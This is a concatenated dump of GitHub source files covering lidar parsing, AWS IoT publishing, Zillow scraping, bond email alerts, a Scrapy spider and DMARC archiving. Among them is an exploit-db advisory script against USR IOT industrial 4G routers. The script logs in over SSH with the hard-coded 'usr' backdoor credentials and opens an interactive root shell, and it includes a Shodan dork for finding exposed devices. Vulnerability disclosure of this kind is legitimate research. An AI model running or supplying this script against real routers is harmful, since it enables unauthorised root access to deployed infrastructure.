'ChannelTheta': np.zeros(num_beams),\n 'Properties': np.zeros(num_beams)\n } for n in range(num_layers)]\n\n if not metadata[\"HasDistance\"]:\n print(\n f\"Failed to read beam data from module. No distance data available. Metadata: {metadata}\", file=sys.stderr)\n return None\n\n # Format string used when data is unpacked. For example for three echos, when all data channels are active the\n # result will be '<HHHHHHBH' (6 x 16-bit values = 3 x distance + 3 x rssi, 1 x property, 1 x theta\n # encoding the property all in little endian format marked by '<').\n # See https://docs.python.org/3/library/struct.html for further information.\n format_string = \"<\" \\\n + num_echos * \"H\" \\\n + (num_echos * \"H\" if metadata[\"HasRssi\"] else \"\") \\\n + (\"B\" if metadata[\"HasProperties\"] else \"\") \\\n + (\"H\" if metadata[\"HasTheta\"] else \"\")\n\n # Data is extracted beam by beam from payload whereas all values related to a single beam are parsed at once in\n # each iteration and stored in a tuple. Each beam value (distance, rssi, theta and property) are stored at a\n # distinct index in this tuple:\n tuple_indices_distance = [0] * num_echos\n tuple_indices_rssi = [0] * num_echos\n tuple_index_theta = 0\n tuple_index_property = 0\n tuple_index = 0\n for echo_idx in range(num_echos):\n tuple_indices_distance[echo_idx] = tuple_index\n tuple_index += 1\n if metadata[\"HasRssi\"]:\n tuple_indices_rssi[echo_idx] = tuple_index\n tuple_index += 1\n if metadata[\"HasProperties\"]:\n tuple_index_property = tuple_index\n tuple_index += 1\n if metadata[\"HasTheta\"]:\n tuple_index_theta = tuple_index\n\n # Extract data from payload.\n for beam_idx in range(num_beams):\n for layer_idx in range(num_layers):\n # Extract all beam values at once (as tuple) according to declared format string.\n beamdata = struct.unpack_from(format_string, data, offset)\n offset += struct.calcsize(format_string)\n for echo_idx in range(num_echos):\n tuple_index_distance = tuple_indices_distance[echo_idx]\n tuple_index_rssi = tuple_indices_rssi[echo_idx]\n result[layer_idx]['Distance'][echo_idx][beam_idx] = beamdata[tuple_index_distance] * metadata[\"DistanceScalingFactor\"]\n result[layer_idx]['Rssi'][echo_idx][beam_idx] = beamdata[tuple_index_rssi] if metadata[\"HasRssi\"] else None\n # Theta must be converted from simple unsigned int to actual angle in radians according to: angleUINT = floor(angleRAD * 5215 + 16384)\n result[layer_idx]['ChannelTheta'][beam_idx] = (\n beamdata[tuple_index_theta] - 16384) / 5215.0 if metadata[\"HasTheta\"] else None\n result[layer_idx]['Properties'][beam_idx] = beamdata[tuple_index_property] if metadata[\"HasProperties\"] else None\n\n return {'SegmentData': result}\n\n\ndef _readUint8(data, offset):\n \"\"\"\n Reads one byte as integer at the given offset. Additionally the position of the byte following the integer is\n returned.\n \"\"\"\n return _readUint(data, offset, 1)\n\n\ndef _readUint32(data, offset):\n \"\"\"\n Reads four bytes as integer at the given offset. Additionally the position of the byte following the integer is\n returned.\n \"\"\"\n return _readUint(data, offset, 4)\n\n\ndef _readUint64(data, offset):\n \"\"\"\n Reads eight bytes as integer at the given offset. Additionally the position of the byte following the integer is\n returned.\n \"\"\"\n return _readUint(data, offset, 8)\n\n\ndef _readUint(data, offset, value_size):\n \"\"\"\n Reads an integer of the given size at the specified offset. Additionally the position of the byte following the\n integer is returned.\n \"\"\"\n value = int.from_bytes(\n data[offset:offset+value_size], byteorder='little', signed='false')\n return (value, offset + value_size)\n\n\ndef _readFloat32(data, offset):\n \"\"\"\n Reads four bytes as float at the given offset. Additionally the position of the byte following the float is\n returned.\n \"\"\"\n value_size = 4\n value = struct.unpack('<f', data[offset:offset+value_size])\n return (value[0], offset + value_size)\n\n\ndef _readUint64Array(data, num_elements, offset):\n \"\"\"\n Reads num_elements * 8 bytes as an unsigned integer array at the given offset. Additionally the position of the byte\n following the array is returned.\n \"\"\"\n value_size = num_elements * 8\n array_data = struct.unpack_from('<'+f\"{num_elements}\"+'Q', data, offset)\n return (np.array(array_data), offset + value_size)\n\n\ndef _readFloat32Array(data, num_elements, offset):\n \"\"\"\n Reads num_elements * 4 bytes as a float array at the given offset. Additionally the position of the byte\n following the array is returned.\n \"\"\"\n value_size = num_elements * 4\n array_data = struct.unpack_from('<'+f\"{num_elements}\"+'f', data, offset)\n return (np.array(array_data), offset + value_size)\n\n# ===============================================================================\n\n\nclass Receiver:\n \"\"\"\n Opens the specified port (default is 2115) to listen for incoming Compact formatted segments.\n \"\"\"\n\n def __init__(self, host=\"localhost\", port=2115):\n self.connection = connectionHandler.UDPHandler(\n host,\n port,\n # Remote address actually not used since we just want to receive and not send data.\n \"localhost\",\n # Remote port actually not used since we just want to receive and not send data.\n 65535,\n # Buffersize should be large enough to handle multiple layers with many beams.\n 100000\n )\n\n def closeConnection(self):\n \"\"\"\n Closes the underlying connection.\n \"\"\"\n del self.connection\n\n # receive the specified number of segments\n def receiveSegments(self, nbSegments):\n \"\"\"\n Receives the specified number of segments and returns them as an array along with arrays of corresponding frame\n and segment numbers.\n \"\"\"\n segments_received = []\n frame_numbers = []\n segment_numbers = []\n\n for i in range(0, nbSegments):\n bytes_received, _ = self.connection.receiveNewScanSegment()\n if self.connection.hasNoError():\n print(f\"Received segment {i}.\")\n payload = _verifyAndExtractPayload(bytes_received)\n if payload is None:\n print(f\"Failed to extract payload from data.\", file=sys.stderr)\n continue\n segmentdata = parsePayload(payload)\n if segmentdata is None:\n print(f\"Failed to parse segment data from payload.\",\n file=sys.stderr)\n segments_received.append(segmentdata)\n frame_numbers.append(segmentdata[\"Modules\"][0]['FrameNumber'])\n segment_numbers.append(\n segmentdata[\"Modules\"][0]['SegmentCounter'])\n else:\n print(\n f\"Failed to receive segment. Error code {self.connection.getLastErrorCode}: {self.connection.lastErrorMessage}\", file=sys.stderr)\n\n return (segments_received, frame_numbers, segment_numbers)\n","repo_name":"SICKAG/ScanSegmentAPI","sub_path":"api/compact.py","file_name":"compact.py","file_ext":"py","file_size_in_byte":16481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73442645202","text":"# -*- coding: utf-8 -*-\n\"\"\"\nセンサー値をクラウドにアップロードするコード\n引数1: センサー値のリアルタイムデータ(JSON)\n\"\"\"\nimport sys\nimport json\nimport boto3\nimport datetime\nfrom boto3.session import Session\n\n# ----- 定数 -----\n# このファイルを実行時に受け取る引数(str型)\nARGS = sys.argv\n\n# AWS プロファイル情報\nPROFILE_NAME = 'zynq-handson'\nsession = Session(profile_name=PROFILE_NAME, region_name=\"ap-northeast-1\")\nIOT_DATA = session.client('iot-data')\n\nclass PubSensorData():\n def __init__(self):\n self.arg_accel_x_data = ARGS[1]\n self.arg_accel_y_data = ARGS[2]\n self.arg_accel_z_data = ARGS[3]\n self.arg_gyro_x_data = ARGS[4]\n self.arg_gyro_y_data = ARGS[5]\n self.arg_gyro_z_data = ARGS[6]\n self.arg_mag_x_data = ARGS[7]\n self.arg_mag_y_data = ARGS[8]\n self.arg_mag_z_data = ARGS[9]\n\n def get_now_datetime(self):\n now = datetime.datetime.now(tz=datetime.timezone.utc)\n timestamp = now.strftime('%Y-%m-%dT%H:%M:%SZ')\n return timestamp\n\n def create_json_data(self, timestamp):\n sensor_data_json = {\n \"DeviceID\": \"id001\",\n \"Datetime\": timestamp,\n \"AccelX\": float(self.arg_accel_x_data),\n \"AccelY\": float(self.arg_accel_y_data),\n \"AccelZ\": float(self.arg_accel_z_data),\n \"GyroX\" : float(self.arg_gyro_x_data),\n \"GyroY\" : float(self.arg_gyro_y_data),\n \"GyroZ\" : float(self.arg_gyro_z_data),\n \"MagX\" : float(self.arg_mag_x_data),\n \"MagY\" : float(self.arg_mag_y_data),\n \"MagZ\" : float(self.arg_mag_z_data)\n }\n return json.dumps(sensor_data_json)\n\n def publish_sensor_data(self, sensor_data):\n response = IOT_DATA.publish(\n topic='handson/sensorLogData',\n qos = 1,\n payload = sensor_data\n )\n print(response)\n \n def main(self):\n try:\n timestamp = self.get_now_datetime()\n sensor_data = self.create_json_data(timestamp)\n self.publish_sensor_data(sensor_data)\n except Exception as error:\n print(error)\n\n# 初期化\npub_sensor_data = PubSensorData()\n\nif __name__ == \"__main__\":\n pub_sensor_data.main()\n","repo_name":"IoTkyoto/iot-handson-zynq-and-aws","sub_path":"step4/pub_sensor_data.py","file_name":"pub_sensor_data.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4571593696","text":"from bs4 import BeautifulSoup\nimport requests, json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\n\nGOOGLE_FORM = 'https://forms.gle/1EZEnfgpZDBcDzcg8'\nZILLOW_URL = 'https://www.zillow.com/homes/for_rent/1-_beds/?searchQueryState=%7B%22pagination%22%3A%7B%7D%2C%22usersSearchTerm%22%3Anull%2C%22mapBounds%22%3A%7B%22west%22%3A-122.56276167822266%2C%22east%22%3A-122.30389632177734%2C%22south%22%3A37.69261345230467%2C%22north%22%3A37.857877098316834%7D%2C%22isMapVisible%22%3Atrue%2C%22filterState%22%3A%7B%22fr%22%3A%7B%22value%22%3Atrue%7D%2C%22fsba%22%3A%7B%22value%22%3Afalse%7D%2C%22fsbo%22%3A%7B%22value%22%3Afalse%7D%2C%22nc%22%3A%7B%22value%22%3Afalse%7D%2C%22cmsn%22%3A%7B%22value%22%3Afalse%7D%2C%22auc%22%3A%7B%22value%22%3Afalse%7D%2C%22fore%22%3A%7B%22value%22%3Afalse%7D%2C%22pmf%22%3A%7B%22value%22%3Afalse%7D%2C%22pf%22%3A%7B%22value%22%3Afalse%7D%2C%22mp%22%3A%7B%22max%22%3A3000%7D%2C%22price%22%3A%7B%22max%22%3A872627%7D%2C%22beds%22%3A%7B%22min%22%3A1%7D%7D%2C%22isListVisible%22%3Atrue%2C%22mapZoom%22%3A12%7D'\nCHROME_DRIVER_PATH = '<Chrome Driver Path>'\nplace_to_search = 'San Francisco, CA'\nZILLOW_MAIN_PAGE = 'https://www.zillow.com/'\n\n\nclass ZillowRent:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36',\n 'Accept-Language': 'en-US'\n }\n\n def __init__(self):\n self.response = requests.get(ZILLOW_URL, headers=self.headers)\n self.zillow_results = self.response.text\n self.soup = BeautifulSoup(self.zillow_results, \"html.parser\")\n self.data = json.loads(str(self.soup.select_one(\"script[data-zrr-shared-data-key]\").contents[0]).strip(\"!<>-\"))\n\n def getHouseLinks(self):\n house_links = [\n result[\"detailUrl\"]\n for result in self.data[\"cat1\"][\"searchResults\"][\"listResults\"]\n ]\n\n house_links = [links.replace(links, ZILLOW_MAIN_PAGE+links) if not links.startswith(\"http\") else links for links in house_links]\n return house_links\n\n def getHouseAddr(self):\n house_address = [\n result[\"address\"]\n for result in self.data[\"cat1\"][\"searchResults\"][\"listResults\"]\n ]\n return house_address\n\n def getRentPrice(self):\n house_rent = [\n int(result[\"units\"][0][\"price\"].strip(\"$\").replace(\",\", \"\").strip(\"+\"))\n if \"units\" in result\n else result[\"unformattedPrice\"]\n for result in self.data[\"cat1\"][\"searchResults\"][\"listResults\"]\n ]\n return house_rent\n\nclass GoogleForm:\n def __init__(self):\n self.data = ZillowRent()\n self.driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH)\n self.driver.get(GOOGLE_FORM)\n time.sleep(5)\n\n def getData(self):\n links = self.data.getHouseLinks()\n addr = self.data.getHouseAddr()\n rents = self.data.getRentPrice()\n return links, addr, rents\n\n def fillForm(self):\n links, addr, rents = self.getData()\n for index in range(len(links)):\n address_element = self.driver.find_element(By.XPATH, value='/html/body/div/div[2]/form/div[2]/div/div[2]/div[1]/div/div/div[2]/div/div[1]/div/div[1]/input')\n address_element.send_keys(addr[index])\n rent_element = self.driver.find_element(By.XPATH, value='/html/body/div/div[2]/form/div[2]/div/div[2]/div[2]/div/div/div[2]/div/div[1]/div/div[1]/input')\n rent_element.send_keys(rents[index])\n links_element = self.driver.find_element(By.XPATH, value='/html/body/div/div[2]/form/div[2]/div/div[2]/div[3]/div/div/div[2]/div/div[1]/div/div[1]/input')\n links_element.send_keys(links[index])\n submit = self.driver.find_element(By.XPATH, value='/html/body/div/div[2]/form/div[2]/div/div[3]/div[1]/div[1]/div/span/span')\n submit.click()\n time.sleep(3)\n next_response = self.driver.find_element(By.CSS_SELECTOR, value='.c2gzEf a')\n next_response.click()\n time.sleep(5)\n\n\nform = GoogleForm()\nform.fillForm()\n","repo_name":"kuntal2098/Zillow-Renting-Search","sub_path":"rentsearch.py","file_name":"rentsearch.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40708104205","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport requests\nimport datetime\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nfrom smtplib import SMTP_SSL\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nurl = \"http://dcfm.eastmoney.com/em_mutisvcexpandinterface/api/js/get?type=KZZ_LB&token=70f12f2f4f091e459a279469fe49eca5\"\nhttp_proxy = none #\"http://proxy-shm.intel.com:911\"\nhttps_proxy = none #\"https://proxy-shm.intel.com:911\"\n\nproxyDict = { \n \"http\" : http_proxy, \n \"https\" : https_proxy, \n }\n\nr = requests.get(url, proxies=proxyDict)\nr.raise_for_status()\n\ntoday = (datetime.datetime.now().date() + datetime.timedelta(days=2)).strftime('%Y-%m-%d')\n\noutput = \"今天是 {}\\n今日可申购可转债: \\n\".format(today)\nfor r in r.json():\n name, date, code = r.get(\"SNAME\"), r.get(\"STARTDATE\"), r.get(\"CORRESCODE\")\n if today in date:\n output += \",\".join((name, date, code))\n output += \"\\n\"\n\nhost_server = 'smtp.qq.com'\nsender_qq = '42397657'\npwd = ''\nsender_qq_mail = '42397657@qq.com'\nreceiver = 'ichbinblau.3@foxmail.com'\nmail_content = output\nmail_title = u\"今日可转债\"\n\n#ssl login\nsmtp = SMTP_SSL(host_server)\nsmtp.set_debuglevel(1)\nsmtp.ehlo(host_server)\nsmtp.login(sender_qq, pwd)\n\nmsg = MIMEText(mail_content, \"plain\", 'utf-8')\nmsg[\"Subject\"] = Header(mail_title, 'utf-8')\nmsg[\"From\"] = sender_qq_mail\nmsg[\"To\"] = receiver\nsmtp.sendmail(sender_qq_mail, receiver, msg.as_string())\nsmtp.quit()\n","repo_name":"ichbinblau/getBonds","sub_path":"pull.py","file_name":"pull.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39494916818","text":"# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor\n# Exploit Author: LiquidWorm\n\n#!/usr/bin/env python3\n#\n#\n# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor\n#\n#\n# Vendor: Jinan USR IOT Technology Limited\n# Product web page: https://www.pusr.com | https://www.usriot.com\n# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)\n# 1.2.7 (USR-LG220-L)\n#\n# Summary: USR-G806 is a industrial 4G wireless LTE router which provides\n# a solution for users to connect own device to 4G network via WiFi interface\n# or Ethernet interface. USR-G806 adopts high performance embedded CPU which\n# can support 580MHz working frequency and can be widely used in Smart Grid,\n# Smart Home, public bus and Vending machine for data transmission at high\n# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,\n# flow control and has many advantages including high reliability, simple\n# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,\n# WLAN interface, 4G interface. USR-G806 provides various networking mode\n# to help user establish own network.\n#\n# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials\n# within its Linux distribution image. These sets of credentials are never\n# exposed to the end-user and cannot be changed through any normal operation\n# of the device. The 'usr' account with password 'www.usr.cn' has the highest\n# privileges on the device. The password is also the default WLAN password.\n# Shodan Dork: title:\"usr-*\" // 4,648 ed ao 15042022\n#\n# -------------------------------------------------------------------------\n# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14\n#\n# --Got rewt!\n# # id;id root;pwd\n# uid=0(usr) gid=0(usr)\n# uid=2(root) gid=2(root) groups=2(root)\n# /root\n# # crontab -l\n# */2 * * * * /etc/ltedial\n# */20 * * * * /etc/init.d/Net_4G_Check.sh\n# */15 * * * * /etc/test_log.sh\n# */120 * * * * /etc/pddns/pddns_start.sh start &\n# 44 4 * * * /etc/init.d/sysreboot.sh &\n# */5 * * * * ps | grep \"/usr/sbin/ntpd\" && /etc/init.d/sysntpd stop;\n# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;\n# cat /tmp/usrlte_info\n# Local time is Fri Apr 15 05:38:56 2022\n# (loop)\n# IMEI Number:8*************1\n# Operator information:********Telecom\n# signal intensity:normal(20)\n#\n# Software version number:E*****************G\n# SIM Card CIMI number:4*************7\n# SIM Card number:8******************6\n# Short message service center number:\"+8**********1\"\n# system information:4G Mode\n# PDP protocol:\"IPV4V6\"\n# CREG:register\n# Check ME password:READY\n# base station information:\"4**D\",\"7*****B\"\n# cat /tmp/usrlte_info_imsi\n# 4*************7\n# # exit\n#\n# lqwrm@metalgear:~$\n# -------------------------------------------------------------------------\n#\n# Tested on: GNU/Linux 3.10.14 (mips)\n# OpenWrt/Linaro GCC 4.8-2014.04\n# Ralink SoC MT7628 PCIe RC mode\n# BusyBox v1.22.1\n# uhttpd\n# Lua\n#\n#\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n# @zeroscience\n#\n#\n# Advisory ID: ZSL-2022-5705\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php\n#\n#\n# 10.04.2022\n#\n\n\nimport paramiko as bah\nimport sys as baaaaaah\n\nbnr='''\n ▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄\n █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██\n █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪\n ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·\n▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄\n▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·\n▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄\n██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌\n·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀\n ▀▄ █·▪ ▪ •██\n ▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪\n ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·\n ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·\n ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.\n ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄\n ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█\n ▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀\n'''\nprint(bnr)\n\nif len(baaaaaah.argv)<2:\n print('--Gief me an IP.')\n exit(0)\n\nadrs=baaaaaah.argv[1]\nunme='usr'\npwrd='www.usr.cn'\n\nrsh=bah.SSHClient()\nrsh.set_missing_host_key_policy(bah.AutoAddPolicy())\ntry:\n rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.\n print('--Got rewt!')\nexcept:\n print('--Backdoor removed.')\n exit(-1)\n\nwhile True:\n cmnd=input('# ')\n if cmnd=='exit':\n rsh.exec_command('exit')\n break\n stdin,stdout,stderr = rsh.exec_command(cmnd)\n print(stdout.read().decode().strip())\n\nrsh.close()","repo_name":"Doctype02/exploitdb","sub_path":"exploits/hardware/remote/50894.py","file_name":"50894.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"15986840200","text":"# -*- coding: utf-8 -*-\n\n\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom regeant.models import RegeantItem, Producer, Brand\nfrom .utils import HelperMixin\n\n\nclass ApplichemSpider(CrawlSpider, HelperMixin):\n name = 'applichem'\n allowed_domains = ['www.applichemus.com']\n start_urls = ['https://www.applichemus.com/products.php']\n\n rules = (\n Rule(SgmlLinkExtractor(\n allow=(r'/products.php', r'/products.php\\?page=\\d+')), follow=True),\n Rule(SgmlLinkExtractor(\n allow=(r'/[\\w-]+\\.html$',)), callback='parse_item'))\n\n def __init__(self):\n self.producer = Producer.objects.get(name='Applichem')\n self.brand = Brand.objects.get(name='Applichem')\n CrawlSpider.__init__(self)\n\n def parse_item(self, response):\n hxs = HtmlXPathSelector(response)\n i = RegeantItem()\n i['product_name'] = self.join(\n hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/div[1]/div/table/tbody/tr[1]/td/text()').extract()) \\\n if hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/div[1]/div/table/tbody/tr[1]/td/text()').extract() else \"\"\n i['product_english_name'] = self.join(\n hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/div[1]/div/table/tbody/tr[1]/td/text()').extract()) \\\n if hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/div[1]/div/table/tbody/tr[1]/td/text()').extract() else \"\"\n product_no = self.join(\n hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/h1/span/text()').extract()) \\\n if hxs.select('//div[@id=\"Content\"]/div[2]/div[1]/div[1]/div/div/div/h1/span/text()').extract() else \"\"\n i['product_no'] = product_no.replace(u\"Item#: \", u\"\")\n i['producer'] = self.producer\n i['brand'] = self.brand\n i['url_path'] = response.url\n return i\n","repo_name":"fanshaorui/phdgogo","sub_path":"regeant/spiders/applichem.py","file_name":"applichem.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14593255947","text":"#!/usr/bin/env python3\n\nimport builtins\nimport json\nimport os,re,sqlite3,sys\nimport yaml\n\nfrom datetime import datetime\n\n\n### Custom includes\n\nfrom include import db\nfrom include import decompress\nfrom include import function\nfrom include import imap\nfrom include import xmlparse\n\n\n### Config\n\nconfig = \"/etc/dmarchiver.conf\"\n\ntry:\n\tfh = open(config, 'r')\nexcept FileNotFoundError:\n\ttry:\n\t\tconfig = os.path.dirname(os.path.realpath(__file__)) + \"/dmarchiver.conf\"\n\t\tfh = open(config, 'r')\n\texcept FileNotFoundError:\n\t\tprint(\"No Config file found, Aborting\")\n\t\tsys.exit(1)\n\t\n\ntry:\n\twith open(config, 'r') as ymlfile:\n\t\tcfg = yaml.safe_load(ymlfile)\n\n\t\timap_host = cfg['imap']['imap_host']\n\t\timap_port = cfg['imap']['imap_port']\n\t\timap_user = cfg['imap']['imap_user']\n\t\timap_pass = cfg['imap']['imap_pass']\n\t\timap_folder = cfg['imap']['imap_folder']\n\t\tdone_folder = cfg['imap']['done_folder']\n\t\tuse_tls = cfg['connection']['use_tls']\n\t\tuse_starttls = cfg['connection']['use_starttls']\n\t\tallowed_content = cfg['content']['allowed']\n\t\tdaemon_mode\t\t= cfg['process']['daemon']\n\t\tdelay_interval = cfg['process']['delay']\n\t\tlogfile\t\t\t= cfg['process']['logfile']\n\t\tsqlitefile\t\t= cfg['process']['sqlitefile']\n\t\ttmpdir\t\t\t= cfg['process']['tmpdir']\n\t\tdebug\t\t\t= cfg['process']['debug']\n\nexcept Exception as e:\n\tprint(\"Error: %s\" % (e))\n\tlog(logfile,\"ERR\", \"Error parsing config file: %s\" % (e))\n\tsys.exit(1)\n\n### make 'logfile' and 'allowed_content', 'tmpdir' variable global to all imported modules\nbuiltins.logfile \t\t\t= logfile\nbuiltins.allowed_content\t= allowed_content\nbuiltins.tmpdir\t\t\t\t= tmpdir\nbuiltins.debug\t\t\t\t= debug\nbuiltins.sqlitefile\t\t\t= sqlitefile\n\n\n#-----------------------------------\n### 'Inline DB schema'\n### (in case DB does not exist ->\n### then create it\n#-----------------------------------\n \nif not(os.path.isfile(sqlitefile)):\n\n\tconn = sqlite3.connect(sqlitefile)\n\tc = conn.cursor()\n\t\n\tc.execute('''CREATE TABLE dmarc_reports (\n ID INT PRIMARY KEY NOT NULL,\n org_name CHAR(50) NOT NULL,\n org_mail CHAR(80) NOT NULL,\n report_id CHAR(50) NOT NULL UNIQUE,\n begin_date INT NOT NULL,\n end_date INT NOT NULL,\n pub_domain CHAR(80) NOT NULL,\n pub_adkim CHAR(2) NOT NULL,\n pub_aspf CHAR(2) NOT NULL,\n pub_p CHAR(20) NOT NULL,\n pub_sp CHAR(20) NOT NULL,\n pub_pct INT NOT NULL,\n pub_fo INT NOT NULL,\n sip CHAR(18) NOT NULL,\n count INT NOT NULL,\n eval_disp CHAR(10) NOT NULL,\n eval_dkim CHAR(10) NOT NULL,\n eval_spf CHAR(10) NOT NULL,\n header_from CHAR(50) NOT NULL,\n auth_dkim_dom CHAR(50) NOT NULL,\n auth_dkim_res CHAR(10) NOT NULL,\n auth_spf_dom CHAR(50) NOT NULL,\n auth_spf_res CHAR(10) NOT NULL\n\t)''')\n\n### check if tmpdir exists\nif not os.path.exists(tmpdir):\n\t\ttry:\n\t\t\tfunction.log(logfile, \"INFO\", \"temp path doesn't exist, trying to create\")\n\t\t\tos.makedirs(tmpdir)\n\t\texcept Exception as e:\n\t\t\tprint(\"Error: %s\" % (e))\n\t\t\tsys.exit(1)\n\n\n### Fetching reports via IMAP\nimap.fetch_report_imap(imap_host, imap_port, imap_user, imap_pass, imap_folder, done_folder, use_starttls, use_tls)\n\n### Parsing reports\n\nfor fn in os.listdir(tmpdir):\n\t\n\tif ( fn.endswith(\".xml\") ):\n\t\tabs_fn = os.path.abspath(os.path.join(tmpdir,fn))\n\t\tcurrent_report = xmlparse.parseXMLfromFile(abs_fn)\n\t\tprint(current_report.submitorg)\n\t\tprint(current_report.submitmail)\n\t\tprint(current_report.repdomain)\n\t\tprint(current_report.repid)\n\t\tprint(current_report.begindate)\n\t\tprint(current_report.enddate)\n\t\tprint(datetime.utcfromtimestamp(int(current_report.begindate)).strftime('%Y-%m-%d %H:%M:%S'))\n\t\tprint(datetime.utcfromtimestamp(int(current_report.enddate)).strftime('%Y-%m-%d %H:%M:%S'))\n\t\t#print(current_report.policy_pub)\n\t\t#print(current_report.identifiers)\n\t\t#print(current_report.auth_results)\n\t\t\t\t\n\t\tdata = json.loads(json.dumps(current_report.policy_pub))\n\t\t\n\t\trepdomain\t= data['repdomain']\n\n\t\ttry:\n\t\t\tadkim \t= data['adkim']\n\t\texcept:\n\t\t\tadkim\t= \"N/A\"\n\n\t\ttry:\n\t\t\taspf\t= data['aspf']\n\t\texcept:\n\t\t\taspf\t= \"N/A\"\n\n\t\ttry:\n\t\t\tp\t\t= data['p']\n\t\texcept:\n\t\t\tp\t\t= \"N/A\"\n\t\t\t\n\t\ttry:\n\t\t\tsp\t\t= data['sp']\n\t\texcept:\n\t\t\tsp\t\t= \"N/A\"\n\n\t\ttry:\n\t\t\tpct\t\t= data['pct']\n\t\texcept:\n\t\t\tpct\t\t= \"N/A\"\n\n\t\ttry:\n\t\t\tfo\t\t= data['fo']\n\t\texcept:\n\t\t\tfo\t\t= \"N/A\"\n\n\t\tdata = json.loads(json.dumps(current_report.policy_eval))\n\n\t\tdisposition\t= data['disposition']\n\t\tdkim\t\t= data['dkim']\n\t\tspf\t\t\t= data['spf']\n\t\t\n\t\tdata = json.loads(json.dumps(current_report.identifiers))\n\t\t\n\t\theader_from\t= data['header_from']\n\t\t\n\t\tdata = json.loads(json.dumps(current_report.auth_results))\n\t\t\n\t\ttry:\n\t\t\tauth_dkim_dom\t= data['dkim']['domain']\n\t\texcept:\n\t\t\tauth_dkim_dom\t= \"N/A\"\n\t\t\n\t\ttry:\n\t\t\tauth_dkim_res\t= data['dkim']['result']\n\t\texcept:\n\t\t\tauth_dkim_res\t= \"N/A\"\n\t\t\n\t\ttry:\n\t\t\tauth_spf_dom\t= data['spf']['domain']\n\t\texcept:\n\t\t\tauth_spf_dom\t= \"N/A\"\n\t\t\n\t\ttry:\n\t\t\tauth_spf_res\t= data['spf']['result']\n\t\texcept:\n\t\t\tauth_spf_res\t= \"N/A\"\n\t\t\t\n\t\tconn = db.connect_db(sqlitefile)\n\t\tID = db.get_last_row_id(conn)\n\n\t\tif ( ID == None ):\n\t\t\tID = 1\n\t\telse:\n\t\t\tID = ID[0] + 1\n\t\t\n\t\tinsert_data = (ID, current_report.submitorg, current_report.submitmail, current_report.repid, \n\t\t\t\t\t current_report.begindate, current_report.enddate, repdomain, adkim, aspf, p, sp, pct,\n\t\t\t\t\t fo, current_report.sip, current_report.cnt, disposition, dkim, spf, header_from,\n\t\t\t\t\t auth_dkim_dom, auth_dkim_res, auth_spf_dom, auth_spf_res 